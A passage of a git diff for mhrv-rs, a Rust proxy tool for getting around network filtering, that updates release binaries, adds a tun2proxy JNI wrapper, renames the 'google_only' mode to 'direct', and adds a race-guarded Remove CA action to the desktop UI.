releases/mhrv-rs-android-universal-v1.9.1.apk index 417022c1..06ae5083 100644 Binary files a/releases/mhrv-rs-android-universal-v1.1.0.apk and b/releases/mhrv-rs-android-universal-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-x86-v1.9.1.apk b/releases/mhrv-rs-android-x86-v1.9.1.apk new file mode 100644 index 00000000..3a5e37d8 Binary files /dev/null and b/releases/mhrv-rs-android-x86-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-x86_64-v1.9.1.apk b/releases/mhrv-rs-android-x86_64-v1.9.1.apk new file mode 100644 index 00000000..7595d9d7 Binary files /dev/null and b/releases/mhrv-rs-android-x86_64-v1.9.1.apk differ diff --git a/releases/mhrv-rs-linux-amd64.tar.gz b/releases/mhrv-rs-linux-amd64.tar.gz index 30e2a7ff..16eb0f43 100644 Binary files a/releases/mhrv-rs-linux-amd64.tar.gz and b/releases/mhrv-rs-linux-amd64.tar.gz differ diff --git a/releases/mhrv-rs-linux-arm64.tar.gz b/releases/mhrv-rs-linux-arm64.tar.gz index 121f5b1e..39db1eca 100644 Binary files a/releases/mhrv-rs-linux-arm64.tar.gz and b/releases/mhrv-rs-linux-arm64.tar.gz differ diff --git a/releases/mhrv-rs-linux-musl-amd64.tar.gz b/releases/mhrv-rs-linux-musl-amd64.tar.gz index 87f3e8c5..28def085 100644 Binary files a/releases/mhrv-rs-linux-musl-amd64.tar.gz and b/releases/mhrv-rs-linux-musl-amd64.tar.gz differ diff --git a/releases/mhrv-rs-linux-musl-arm64.tar.gz b/releases/mhrv-rs-linux-musl-arm64.tar.gz index 53a75366..cf6ac5d2 100644 Binary files a/releases/mhrv-rs-linux-musl-arm64.tar.gz and b/releases/mhrv-rs-linux-musl-arm64.tar.gz differ diff --git a/releases/mhrv-rs-macos-amd64-app.zip b/releases/mhrv-rs-macos-amd64-app.zip index 6d371b1f..b1cbc5ec 100644 Binary files a/releases/mhrv-rs-macos-amd64-app.zip and b/releases/mhrv-rs-macos-amd64-app.zip differ diff --git a/releases/mhrv-rs-macos-amd64.tar.gz b/releases/mhrv-rs-macos-amd64.tar.gz index 46c62afb..539f66df 100644 Binary files a/releases/mhrv-rs-macos-amd64.tar.gz and b/releases/mhrv-rs-macos-amd64.tar.gz differ diff --git a/releases/mhrv-rs-macos-arm64-app.zip b/releases/mhrv-rs-macos-arm64-app.zip index cf5cf66b..ffdf979b 100644 Binary files a/releases/mhrv-rs-macos-arm64-app.zip and b/releases/mhrv-rs-macos-arm64-app.zip differ diff --git a/releases/mhrv-rs-macos-arm64.tar.gz b/releases/mhrv-rs-macos-arm64.tar.gz index c19d34d8..63094363 100644 Binary files a/releases/mhrv-rs-macos-arm64.tar.gz and b/releases/mhrv-rs-macos-arm64.tar.gz differ diff --git a/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz new file mode 100644 index 00000000..0b1f3698 Binary files /dev/null and b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz differ diff --git a/releases/mhrv-rs-raspbian-armhf.tar.gz b/releases/mhrv-rs-raspbian-armhf.tar.gz index 72726890..73b852d2 100644 Binary files a/releases/mhrv-rs-raspbian-armhf.tar.gz and b/releases/mhrv-rs-raspbian-armhf.tar.gz differ diff --git a/releases/mhrv-rs-windows-amd64.zip b/releases/mhrv-rs-windows-amd64.zip index baed0917..7fd3e9d1 100644 Binary files a/releases/mhrv-rs-windows-amd64.zip and b/releases/mhrv-rs-windows-amd64.zip differ diff --git a/src/android_jni.rs b/src/android_jni.rs index 6f467bec..91b4fa53 100644 --- a/src/android_jni.rs +++ b/src/android_jni.rs @@ -42,7 +42,7 @@ struct Running { rt: Option, /// Keep an Arc to the DomainFronter so `statsJson(handle)` can read the /// live stats without going through the async server. `None` for - /// google-only / full-only configs where the fronter isn't used. + /// direct / full-only configs where the fronter isn't used. fronter: Option>, } @@ -457,7 +457,7 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_testSni<'a>( /// `Native.statsJson(long handle)` -> String. Returns a JSON blob with the /// live `StatsSnapshot` for a running proxy, or an empty string if the -/// handle is unknown or the proxy has no fronter (google_only / full modes). +/// handle is unknown or the proxy has no fronter (direct / full modes). /// /// Cheap — just reads a handful of atomics. The Kotlin UI polls this on a /// timer to render the "Usage today (estimated)" card. @@ -482,3 +482,53 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_statsJson<'a>( })); env.new_string(out).map(|s| s.into_raw()).unwrap_or(std::ptr::null_mut()) } + +// --------------------------------------------------------------------------- +// tun2proxy CLI API wrapper (dlsym — no fork or patch needed) +// --------------------------------------------------------------------------- + +/// `Native.runTun2proxy(cliArgs, tunMtu)` -> int +/// +/// Calls `tun2proxy_run_with_cli_args` from libtun2proxy.so via dlsym. +/// This is the C API the tun2proxy maintainer recommends for callers that +/// need full CLI flexibility (e.g. --udpgw-server). BLOCKS until shutdown. +#[no_mangle] +pub extern "system" fn Java_com_therealaleph_mhrv_Native_runTun2proxy<'a>( + mut env: JNIEnv<'a>, + _class: JClass, + cli_args: JString, + tun_mtu: jni::sys::jint, +) -> jni::sys::jint { + safe(-1, AssertUnwindSafe(|| { + let args_str = jstring_to_string(&mut env, &cli_args); + tracing::info!("runTun2proxy: cli={}", args_str); + + unsafe { + use std::ffi::{CStr, CString}; + + let lib = CString::new("libtun2proxy.so").unwrap(); + let handle = libc::dlopen(lib.as_ptr(), libc::RTLD_NOW); + if handle.is_null() { + let err = CStr::from_ptr(libc::dlerror()); + tracing::error!("dlopen libtun2proxy.so failed: {:?}", err); + return -10; + } + + let sym = CString::new("tun2proxy_run_with_cli_args").unwrap(); + let func = libc::dlsym(handle, sym.as_ptr()); + if func.is_null() { + let err = CStr::from_ptr(libc::dlerror()); + tracing::error!("dlsym tun2proxy_run_with_cli_args: {:?}", err); + libc::dlclose(handle); + return -11; + } + + type RunFn = unsafe extern "C" fn(*const std::ffi::c_char, u16, bool) -> i32; + let run: RunFn = std::mem::transmute(func); + let c_args = CString::new(args_str).unwrap(); + let rc = run(c_args.as_ptr(), tun_mtu as u16, false); + libc::dlclose(handle); + rc + } + })) +} diff --git a/src/bin/ui.rs b/src/bin/ui.rs index 8409863b..5da12033 100644 --- a/src/bin/ui.rs +++ b/src/bin/ui.rs @@ -9,8 +9,8 @@ use tokio::runtime::Runtime; use tokio::sync::Mutex as AsyncMutex; use tokio::task::JoinHandle; -use mhrv_rs::cert_installer::install_ca; -use mhrv_rs::config::{Config, ScriptId}; +use mhrv_rs::cert_installer::{install_ca, reconcile_sudo_environment, remove_ca}; +use mhrv_rs::config::{Config, FrontingGroup, ScriptId}; use mhrv_rs::data_dir; use mhrv_rs::domain_fronter::{DomainFronter, DEFAULT_GOOGLE_SNI_POOL}; use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE}; @@ -24,21 +24,38 @@ const LOG_MAX: usize = 200; fn main() -> eframe::Result<()> { let _ = rustls::crypto::ring::default_provider().install_default(); + // Re-point HOME at the invoking user if this binary was launched + // under sudo (see cert_installer::reconcile_sudo_environment). Must + // run before any data_dir / firefox_profile_dirs call. + reconcile_sudo_environment(); mhrv_rs::rlimit::raise_nofile_limit_best_effort(); let shared = Arc::new(Shared::default()); let (cmd_tx, cmd_rx) = std::sync::mpsc::channel::(); + // Load the user's saved form first so we can seed the tracing filter + // with their saved log level. Otherwise the form's log-level combobox + // would only ever take effect via env var or after Save → restart, and + // users on the UI binary (issue #401) reasonably expect the saved + // config.json `log_level` to apply at boot like it does for the CLI. + let (form, load_err) = load_form(); + let initial_toast = load_err.map(|e| (e, Instant::now())); + // Hook tracing events into the Recent log panel. Without this every // tracing::info! / debug! / trace! the proxy emits gets swallowed and // the panel only ever shows our manual push_log calls, making the log // level selector look useless (issue #12 bug 2). // - // The env-filter respects RUST_LOG if set, otherwise defaults to info - // so users see routing decisions immediately without any knob-turning. - // When they start the proxy and Save the config, the log level from the - // config is applied to the in-process filter (see on_start below). - install_ui_tracing(shared.clone()); + // Filter precedence (issue #401 fix in v1.8.2): + // 1. RUST_LOG env var if set — explicit override + // 2. Saved config's `log_level` (passed from form) — what users mean + // when they pick a level in the UI + // 3. "info,hyper=warn" — sensible default + // + // Save inside the running UI also installs the new filter via the + // reload handle (see `LOG_RELOAD` below), so users don't need to + // restart for a config change to take effect. + install_ui_tracing(shared.clone(), &form.log_level); let shared_bg = shared.clone(); std::thread::Builder::new() @@ -46,9 +63,6 @@ fn main() -> eframe::Result<()> { .spawn(move || background_thread(shared_bg, cmd_rx)) .expect("failed to spawn background thread"); - let (form, load_err) = load_form(); - let initial_toast = load_err.map(|e| (e, Instant::now())); - // Pick the renderer. Default is `glow` (OpenGL 2+) because that's // what we shipped through v1.0.x and it has the least binary-size // overhead. Users on older Windows boxes / RDP sessions / headless @@ -68,7 +82,11 @@ fn main() -> eframe::Result<()> { .with_inner_size([WIN_WIDTH, WIN_HEIGHT]) .with_min_inner_size([420.0, 400.0]) .with_title(format!("mhrv-rs {}", VERSION)), - renderer: if use_wgpu { eframe::Renderer::Wgpu } else { eframe::Renderer::Glow }, + renderer: if use_wgpu { + eframe::Renderer::Wgpu + } else { + eframe::Renderer::Glow + }, ..Default::default() }; @@ -116,6 +134,22 @@ struct UiState { /// Set while a download of a release asset is in flight. `None` when /// idle or after a completed download has been acknowledged. download_in_progress: bool, + /// Set while an install-or-remove cert op is in flight. Install and + /// Remove share this single flag so they can't race each other: + /// clicking Install → Remove back-to-back would otherwise leave the + /// final trust/file state dependent on thread scheduling — an + /// in-flight install could re-trust the CA after Remove had already + /// deleted it, or vice versa. Both UI buttons disable while this + /// is set, and both handlers gate-and-flip it. + cert_op_in_progress: bool, + /// Set synchronously when `Cmd::Start` is received by the background + /// thread, cleared synchronously when `Cmd::Stop` completes. Broader + /// than `running` (which only flips after the MITM manager has + /// finished loading). Used to block `Remove CA` during the window + /// between start-click and `running = true` — otherwise a queued + /// `Cmd::RemoveCa` could delete `ca/` while the server is partway + /// through loading the keypair into memory. + proxy_active: bool, /// One-line status of the most recent download (Ok(path) or Err(msg)). last_download: Option>, last_download_at: Option, @@ -139,6 +173,7 @@ enum Cmd { Stop, Test(Config), InstallCa, + RemoveCa, CheckCaTrusted, PollStats, /// Probe a single SNI against the given google_ip. Result is written @@ -181,9 +216,11 @@ struct App { #[derive(Clone)] struct FormState { - /// `"apps_script"` (default) or `"google_only"`. Controls whether the - /// Apps Script relay is wired up at all. In `google_only`, the form - /// tolerates an empty script_id / auth_key. + /// `"apps_script"` (default), `"direct"`, or `"full"`. Controls + /// whether the Apps Script relay is wired up at all. In `direct`, + /// the form tolerates an empty script_id / auth_key. + /// On load we normalize the legacy `"google_only"` string to + /// `"direct"` so the next save rewrites the on-disk config. mode: String, script_id: String, auth_key: String, @@ -209,11 +246,40 @@ struct FormState { show_log: bool, fetch_ips_from_api: bool, max_ips_to_scan: usize, - scan_batch_size:usize, + scan_batch_size: usize, google_ip_validation: bool, normalize_x_graphql: bool, youtube_via_relay: bool, passthrough_hosts: Vec, + /// Round-tripped from config.json so the UI's save path doesn't + /// drop the user's setting. Not currently exposed as a UI control; + /// users edit `block_quic` directly in `config.json` (Issue #213). + block_quic: bool, + /// Round-tripped from config.json. Not exposed as a UI control — + /// users edit `disable_padding` directly when needed (Issue #391). + /// Default false (padding active). + disable_padding: bool, + /// Round-tripped from config.json. Not exposed in the UI form yet — + /// the bypass-DoH default is the right answer for almost everyone + /// (DoH already encrypts, the tunnel was just adding latency), so + /// this is a config-only opt-out. See config.rs `tunnel_doh`. + tunnel_doh: bool, + /// User-supplied DoH hostnames added to the built-in default list, + /// round-tripped from config.json. See config.rs `bypass_doh_hosts`. + bypass_doh_hosts: Vec, + /// Multi-edge fronting groups. Round-tripped from config.json so + /// the UI's Save doesn't drop the user's hand-edited groups — + /// there is no UI editor for these yet, only file-edited config. + /// See config.rs `fronting_groups`. + fronting_groups: Vec, + /// Auto-blacklist tuning + per-batch timeout. Config-only knobs (no UI + /// fields yet — power-user file edit). Round-tripped through FormState + /// so Save preserves the user's hand-edited values. See config.rs + /// `auto_blacklist_*` and `request_timeout_secs`. + auto_blacklist_strikes: u32, + auto_blacklist_window_secs: u64, + auto_blacklist_cooldown_secs: u64, + request_timeout_secs: u64, } #[derive(Clone, Debug)] @@ -254,7 +320,10 @@ fn load_form() -> (FormState, Option) { } } } else { - tracing::info!("config: no config found at {} — starting with defaults", path.display()); + tracing::info!( + "config: no config found at {} — starting with defaults", + path.display() + ); (None, None) }; let form = if let Some(c) = existing { @@ -268,8 +337,18 @@ fn load_form() -> (FormState, Option) { }, }; let sni_pool = sni_pool_for_form(c.sni_hosts.as_deref(), &c.front_domain); + // Normalize the legacy `google_only` mode string on load. The + // backend's `mode_kind()` accepts the alias forever, but storing + // it as `direct` in the form means the next Save rewrites the + // on-disk config to the new name — one-way migration, no warn + // on every startup. + let mode_normalized = if c.mode == "google_only" { + "direct".to_string() + } else { + c.mode.clone() + }; FormState { - mode: c.mode.clone(), + mode: mode_normalized, script_id: sid, auth_key: c.auth_key, google_ip: c.google_ip, @@ -286,13 +365,22 @@ fn load_form() -> (FormState, Option) { sni_custom_input: String::new(), sni_editor_open: false, show_log: true, - fetch_ips_from_api:c.fetch_ips_from_api, - max_ips_to_scan:c.max_ips_to_scan, + fetch_ips_from_api: c.fetch_ips_from_api, + max_ips_to_scan: c.max_ips_to_scan, google_ip_validation: c.google_ip_validation, - scan_batch_size:c.scan_batch_size, + scan_batch_size: c.scan_batch_size, normalize_x_graphql: c.normalize_x_graphql, youtube_via_relay: c.youtube_via_relay, passthrough_hosts: c.passthrough_hosts.clone(), + block_quic: c.block_quic, + disable_padding: c.disable_padding, + tunnel_doh: c.tunnel_doh, + bypass_doh_hosts: c.bypass_doh_hosts.clone(), + fronting_groups: c.fronting_groups.clone(), + auto_blacklist_strikes: c.auto_blacklist_strikes, + auto_blacklist_window_secs: c.auto_blacklist_window_secs, + auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs, + request_timeout_secs: c.request_timeout_secs, } } else { FormState { @@ -313,13 +401,24 @@ fn load_form() -> (FormState, Option) { sni_custom_input: String::new(), sni_editor_open: false, show_log: true, - fetch_ips_from_api:false, - max_ips_to_scan:100, - google_ip_validation:true, - scan_batch_size:500, + fetch_ips_from_api: false, + max_ips_to_scan: 100, + google_ip_validation: true, + scan_batch_size: 500, normalize_x_graphql: false, youtube_via_relay: false, passthrough_hosts: Vec::new(), + block_quic: false, + disable_padding: false, + tunnel_doh: true, + bypass_doh_hosts: Vec::new(), + fronting_groups: Vec::new(), + // Defaults match `default_auto_blacklist_*` and + // `default_request_timeout_secs` in src/config.rs. + auto_blacklist_strikes: 3, + auto_blacklist_window_secs: 30, + auto_blacklist_cooldown_secs: 120, + request_timeout_secs: 30, } }; (form, load_err) @@ -371,8 +470,10 @@ fn sni_pool_for_form(user: Option<&[String]>, front_domain: &str) -> Vec impl FormState { fn to_config(&self) -> Result { - let is_google_only = self.mode == "google_only"; - if !is_google_only { + // `direct` and the legacy `google_only` alias both run without + // an Apps Script relay, so neither requires a script_id. + let is_direct = self.mode == "direct" || self.mode == "google_only"; + if !is_direct { if self.script_id.trim().is_empty() { return Err("Apps Script ID is required".into()); } @@ -450,10 +551,10 @@ impl FormState { Some(active) } }, - fetch_ips_from_api:self.fetch_ips_from_api, + fetch_ips_from_api: self.fetch_ips_from_api, max_ips_to_scan: self.max_ips_to_scan, - google_ip_validation:self.google_ip_validation, - scan_batch_size:self.scan_batch_size, + google_ip_validation: self.google_ip_validation, + scan_batch_size: self.scan_batch_size, normalize_x_graphql: self.normalize_x_graphql, // UI form doesn't expose youtube_via_relay yet — it's a // config-only flag for now. Passed through from the loaded @@ -462,6 +563,36 @@ impl FormState { // Similarly config-only for now; round-trips through the // file so the UI doesn't drop the user's entries on save. passthrough_hosts: self.passthrough_hosts.clone(), + // Issue #213: block_quic is config-only for now (no UI + // control yet). Round-trip through the file so save + // doesn't drop a user-set true. + block_quic: self.block_quic, + // Issue #391: disable_padding is config-only for now. + // Round-trip preserves the user's choice. + disable_padding: self.disable_padding, + // DoH bypass is enabled-by-default with `tunnel_doh = false`. + // Round-trip the user's choice (and any extra hostnames they + // added) so save doesn't drop them. + tunnel_doh: self.tunnel_doh, + bypass_doh_hosts: self.bypass_doh_hosts.clone(), + // Multi-edge fronting groups: file-edited only for now, + // round-tripped through the UI so Save doesn't drop them. + fronting_groups: self.fronting_groups.clone(), + // PR #448 (Android): adaptive coalesce window. Desktop UI + // doesn't expose sliders for these yet (Android does), so + // we pass 0 to keep the compiled defaults (40ms step, + // 1000ms max). Round-trip planned for the v1.8.x desktop UI + // batch alongside the system-proxy toggle (#432). + coalesce_step_ms: 0, + coalesce_max_ms: 0, + // Auto-blacklist + batch timeout: config-only knobs (#391, + // #444, #430). Round-trip through FormState so Save doesn't + // drop hand-edited values. UI editor planned alongside the + // v1.8.x desktop UI batch. + auto_blacklist_strikes: self.auto_blacklist_strikes, + auto_blacklist_window_secs: self.auto_blacklist_window_secs, + auto_blacklist_cooldown_secs: self.auto_blacklist_cooldown_secs, + request_timeout_secs: self.request_timeout_secs, }) } } @@ -513,8 +644,33 @@ struct ConfigWire<'a> { max_ips_to_scan: usize, scan_batch_size: usize, google_ip_validation: bool, + /// Default false (= bypass DoH). Only emitted when explicitly true + /// so unchanged configs stay clean. + #[serde(skip_serializing_if = "is_false")] + tunnel_doh: bool, + #[serde(skip_serializing_if = "Vec::is_empty")] + bypass_doh_hosts: &'a Vec, + #[serde(skip_serializing_if = "Vec::is_empty")] + fronting_groups: &'a Vec, + /// Auto-blacklist tuning + batch timeout (#391, #444, #430). Skip + /// serialization when matching the historical defaults so unchanged + /// configs stay clean — only emitted when the user has explicitly + /// tuned them. + #[serde(skip_serializing_if = "is_default_strikes")] + auto_blacklist_strikes: u32, + #[serde(skip_serializing_if = "is_default_window_secs")] + auto_blacklist_window_secs: u64, + #[serde(skip_serializing_if = "is_default_cooldown_secs")] + auto_blacklist_cooldown_secs: u64, + #[serde(skip_serializing_if = "is_default_timeout_secs")] + request_timeout_secs: u64, } +fn is_default_strikes(v: &u32) -> bool { *v == 3 } +fn is_default_window_secs(v: &u64) -> bool { *v == 30 } +fn is_default_cooldown_secs(v: &u64) -> bool { *v == 120 } +fn is_default_timeout_secs(v: &u64) -> bool { *v == 30 } + fn is_false(b: &bool) -> bool { !*b } @@ -561,6 +717,13 @@ impl<'a> From<&'a Config> for ConfigWire<'a> { max_ips_to_scan: c.max_ips_to_scan, scan_batch_size: c.scan_batch_size, google_ip_validation: c.google_ip_validation, + tunnel_doh: c.tunnel_doh, + bypass_doh_hosts: &c.bypass_doh_hosts, + fronting_groups: &c.fronting_groups, + auto_blacklist_strikes: c.auto_blacklist_strikes, + auto_blacklist_window_secs: c.auto_blacklist_window_secs, + auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs, + request_timeout_secs: c.request_timeout_secs, } } } @@ -584,10 +747,7 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) { ui.add_space(2.0); let frame = egui::Frame::none() .fill(egui::Color32::from_rgb(28, 30, 34)) - .stroke(egui::Stroke::new( - 1.0, - egui::Color32::from_rgb(50, 54, 60), - )) + .stroke(egui::Stroke::new(1.0, egui::Color32::from_rgb(50, 54, 60))) .rounding(6.0) .inner_margin(egui::Margin::same(10.0)); frame.show(ui, body); @@ -596,10 +756,14 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) { /// A primary accent-filled button. Used for the headline action in a row /// (Start / Stop / SNI pool). fn primary_button(text: &str) -> egui::Button<'_> { - egui::Button::new(egui::RichText::new(text).color(egui::Color32::WHITE).strong()) - .fill(ACCENT) - .min_size(egui::vec2(120.0, 28.0)) - .rounding(4.0) + egui::Button::new( + egui::RichText::new(text) + .color(egui::Color32::WHITE) + .strong(), + ) + .fill(ACCENT) + .min_size(egui::vec2(120.0, 28.0)) + .rounding(4.0) } /// A compact form row: label on the left (fixed width for vertical alignment), @@ -697,19 +861,20 @@ impl eframe::App for App { // ── Section: Mode ───────────────────────────────────────────── // Surfacing the mode at the top of the form because it changes - // which of the sections below are actually used. google_only is - // a bootstrap mode for users who don't yet have internet access - // to deploy Code.gs — once deployed, they switch back to - // apps_script. + // which of the sections below are actually used. `direct` runs + // without the Apps Script relay (Google edge + any configured + // fronting_groups via the SNI-rewrite tunnel only) — useful as + // a bootstrap to deploy Code.gs, or as a standalone mode for + // users who only need access to fronting-group targets. section(ui, "Mode", |ui| { form_row(ui, "Mode", Some( "apps_script: DPI bypass via Apps Script relay (needs cert).\n\ full: tunnel ALL traffic through Apps Script + tunnel node (no cert needed).\n\ - google_only: bootstrap — direct SNI-rewrite tunnel to *.google.com only." + direct: SNI-rewrite tunnel only — no relay (Google edge + any fronting_groups)." ), |ui| { egui::ComboBox::from_id_source("mode") .selected_text(match self.form.mode.as_str() { - "google_only" => "Google-only (bootstrap)", + "direct" | "google_only" => "Direct (no relay)", "full" => "Full tunnel (no cert)", _ => "Apps Script (MITM)", }) @@ -726,16 +891,16 @@ impl eframe::App for App { ); ui.selectable_value( &mut self.form.mode, - "google_only".into(), - "Google-only (bootstrap)", + "direct".into(), + "Direct (no relay)", ); }); }); - if self.form.mode == "google_only" { + if self.form.mode == "direct" || self.form.mode == "google_only" { ui.horizontal(|ui| { ui.add_space(120.0 + 8.0); ui.small(egui::RichText::new( - "Bootstrap mode — reach script.google.com to deploy Code.gs, then switch back to Apps Script.", + "Direct mode — SNI-rewrite tunnel only. Reach the Google edge (and any configured fronting_groups) without an Apps Script relay.", ) .color(OK_GREEN)); }); @@ -751,11 +916,11 @@ impl eframe::App for App { } }); - let google_only = self.form.mode == "google_only"; + let direct_mode = self.form.mode == "direct" || self.form.mode == "google_only"; // ── Section: Apps Script relay ──────────────────────────────── section(ui, "Apps Script relay", |ui| { - ui.add_enabled_ui(!google_only, |ui| { + ui.add_enabled_ui(!direct_mode, |ui| { form_row(ui, "Deployment IDs", Some( "One deployment ID per line. Proxy round-robins between them and sidelines \ any ID that hits its daily quota for 10 minutes before retrying." @@ -945,7 +1110,12 @@ impl eframe::App for App { ui.horizontal(|ui| { if ui.add(primary_button("Save config")).clicked() { match self.form.to_config().and_then(|c| save_config(&c)) { - Ok(p) => self.toast = Some((format!("Saved to {}", p.display()), Instant::now())), + Ok(p) => { + // Apply the new log level live so users don't have to + // restart for the combobox to take effect (#401). + apply_log_level(&self.form.log_level); + self.toast = Some((format!("Saved to {}", p.display()), Instant::now())); + } Err(e) => self.toast = Some((format!("Save failed: {}", e), Instant::now())), } } @@ -1074,7 +1244,7 @@ impl eframe::App for App { ), ), ("bytes today", fmt_bytes(s.today_bytes)), - ("UTC day", s.today_key.clone()), + ("PT day", s.today_key.clone()), ("resets in", reset_str), ]; egui::Grid::new("usage_today") @@ -1209,9 +1379,54 @@ impl eframe::App for App { // Secondary actions — smaller, grouped together on their own line. ui.add_space(4.0); ui.horizontal(|ui| { - if ui.small_button("Install CA").clicked() { - let _ = self.cmd_tx.send(Cmd::InstallCa); - } + // Install CA and Remove CA share a single in-flight flag + // so back-to-back clicks can't race — an in-flight + // install would otherwise re-trust the CA after Remove + // deleted it (or vice versa). Both buttons disable when + // either op is running. + let (cert_op_in_flight, proxy_active) = { + let s = self.shared.state.lock().unwrap(); + (s.cert_op_in_progress, s.proxy_active) + }; + + let install_hover = if cert_op_in_flight { + "A cert install/remove is already in progress." + } else { + "Install the MITM CA into the OS trust store (and NSS if certutil \ + is available)." + }; + ui.add_enabled_ui(!cert_op_in_flight, |ui| { + if ui + .small_button("Install CA") + .on_hover_text(install_hover) + .clicked() + { + let _ = self.cmd_tx.send(Cmd::InstallCa); + } + }); + + let remove_hover = if proxy_active || running { + "Stop the proxy first — the CA keypair is held in memory by the \ + running MITM engine, and removing it now would break HTTPS for \ + every site until restart." + } else if cert_op_in_flight { + "A cert install/remove is already in progress." + } else { + "Remove the MITM CA from the OS trust store (verified by name) \ + and delete the on-disk ca/ directory. NSS cleanup (Firefox/Chrome) \ + is best-effort and logs a hint if certutil is missing or a browser \ + has the DB locked. A fresh CA is generated the next time you start \ + the proxy. Your config.json and the Apps Script deployment are NOT \ + touched — no need to redeploy Code.gs." + }; + ui.add_enabled_ui(!proxy_active && !running && !cert_op_in_flight, |ui| { + if ui.small_button("Remove CA") + .on_hover_text(remove_hover) + .clicked() + { + let _ = self.cmd_tx.send(Cmd::RemoveCa); + } + }); if ui.small_button("Check CA").clicked() { let _ = self.cmd_tx.send(Cmd::CheckCaTrusted); } @@ -1736,13 +1951,16 @@ fn background_thread(shared: Arc, rx: Receiver) { }); } } - // In background_thread function, modify the Cmd::Start handler: Ok(Cmd::Start(cfg)) => { if active.is_some() { push_log(&shared, "[ui] already running"); continue; } push_log(&shared, "[ui] starting proxy..."); + // Flip proxy_active synchronously so a `Remove CA` click + // queued in the same frame as Start is rejected before + // the MITM manager begins loading. + shared.state.lock().unwrap().proxy_active = true; let shared2 = shared.clone(); let fronter_slot: Arc>>> = Arc::new(AsyncMutex::new(None)); @@ -1756,7 +1974,9 @@ fn background_thread(shared: Arc, rx: Receiver) { Ok(m) => m, Err(e) => { push_log(&shared2, &format!("[ui] MITM init failed: {}", e)); - shared2.state.lock().unwrap().running = false; + let mut s = shared2.state.lock().unwrap(); + s.running = false; + s.proxy_active = false; return; } }; @@ -1765,11 +1985,13 @@ fn background_thread(shared: Arc, rx: Receiver) { Ok(s) => s, Err(e) => { push_log(&shared2, &format!("[ui] proxy build failed: {}", e)); - shared2.state.lock().unwrap().running = false; + let mut st = shared2.state.lock().unwrap(); + st.running = false; + st.proxy_active = false; return; } }; - // `fronter()` is `None` in google_only (bootstrap) mode — the + // `fronter()` is `None` in direct mode — the // status panel's relay stats simply show no data in that case. *fronter_slot2.lock().await = server.fronter(); { @@ -1792,8 +2014,15 @@ fn background_thread(shared: Arc, rx: Receiver) { push_log(&shared2, &format!("[ui] proxy error: {}", e)); } - shared2.state.lock().unwrap().running = false; - shared2.state.lock().unwrap().started_at = None; + { + let mut st = shared2.state.lock().unwrap(); + st.running = false; + st.started_at = None; + // Self-exit path (e.g. bind error after startup, + // or normal shutdown without Cmd::Stop). The + // Stop handler clears this too — either is fine. + st.proxy_active = false; + } push_log(&shared2, "[ui] proxy stopped"); }); @@ -1819,8 +2048,10 @@ fn background_thread(shared: Arc, rx: Receiver) { } }); - shared.state.lock().unwrap().running = false; - shared.state.lock().unwrap().started_at = None; + let mut st = shared.state.lock().unwrap(); + st.running = false; + st.started_at = None; + st.proxy_active = false; } } @@ -1848,29 +2079,106 @@ fn background_thread(shared: Arc, rx: Receiver) { }); } Ok(Cmd::InstallCa) => { + // Share the cert-op flag with Remove CA so the two + // can't race. Gate and flip before spawning; the worker + // clears on exit. + { + let mut st = shared.state.lock().unwrap(); + if st.cert_op_in_progress { + push_log( + &shared, + "[ui] cert op already in progress — ignoring duplicate install", + ); + continue; + } + st.cert_op_in_progress = true; + } let shared2 = shared.clone(); std::thread::spawn(move || { push_log(&shared2, "[ui] installing CA..."); let base = data_dir::data_dir(); - if let Err(e) = MitmCertManager::new_in(&base) { - push_log(&shared2, &format!("[ui] CA init failed: {}", e)); - return; - } - let ca = base.join(CA_CERT_FILE); - match install_ca(&ca) { - Ok(()) => { - push_log(&shared2, "[ui] CA install ok"); - let mut st = shared2.state.lock().unwrap(); + let result = (|| -> Result<(), String> { + if let Err(e) = MitmCertManager::new_in(&base) { + return Err(format!("CA init failed: {}", e)); + } + let ca = base.join(CA_CERT_FILE); + install_ca(&ca).map_err(|e| format!("CA install failed: {}", e)) + })(); + { + let mut st = shared2.state.lock().unwrap(); + st.cert_op_in_progress = false; + if result.is_ok() { st.ca_trusted = Some(true); st.ca_trusted_at = Some(Instant::now()); } - Err(e) => { - push_log(&shared2, &format!("[ui] CA install failed: {}", e)); + } + match result { + Ok(()) => push_log(&shared2, "[ui] CA install ok"), + Err(msg) => { + push_log(&shared2, &format!("[ui] {}", msg)); push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --install-cert"); } } }); } + Ok(Cmd::RemoveCa) => { + // Authoritative proxy-active guard: the UI button is + // disabled when proxy_active/running is set, but a + // Cmd::RemoveCa may already be queued by the time the + // Start handler flips the flag. `active` is owned by + // this thread so its state is the real source of truth + // — reject removal any time a proxy handle is alive, + // whether it's still starting or fully running. + if active.is_some() { + push_log( + &shared, + "[ui] cannot remove CA: proxy is running or starting — stop it first", + ); + continue; + } + // Shared cert-op gate: covers Install CA too, so back- + // to-back Install → Remove clicks can't race. The + // button is already disabled while this is set, but a + // queued command can still arrive here. + { + let mut st = shared.state.lock().unwrap(); + if st.cert_op_in_progress { + push_log( + &shared, + "[ui] cert op already in progress — ignoring duplicate remove", + ); + continue; + } + st.cert_op_in_progress = true; + } + let shared2 = shared.clone(); + std::thread::spawn(move || { + push_log(&shared2, "[ui] removing CA (trust store + files)..."); + let base = data_dir::data_dir(); + let result = remove_ca(&base); + { + let mut st = shared2.state.lock().unwrap(); + st.cert_op_in_progress = false; + if result.is_ok() { + st.ca_trusted = Some(false); + st.ca_trusted_at = Some(Instant::now()); + } + } + match result { + Ok(outcome) => { + push_log(&shared2, &format!("[ui] {}", outcome.summary())); + push_log( + &shared2, + "[ui] config.json and Apps Script deployment untouched", + ); + } + Err(e) => { + push_log(&shared2, &format!("[ui] CA remove failed: {}", e)); + push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --remove-cert"); + } + } + }); + } Ok(Cmd::TestSni { google_ip, sni }) => { let shared2 = shared.clone(); { @@ 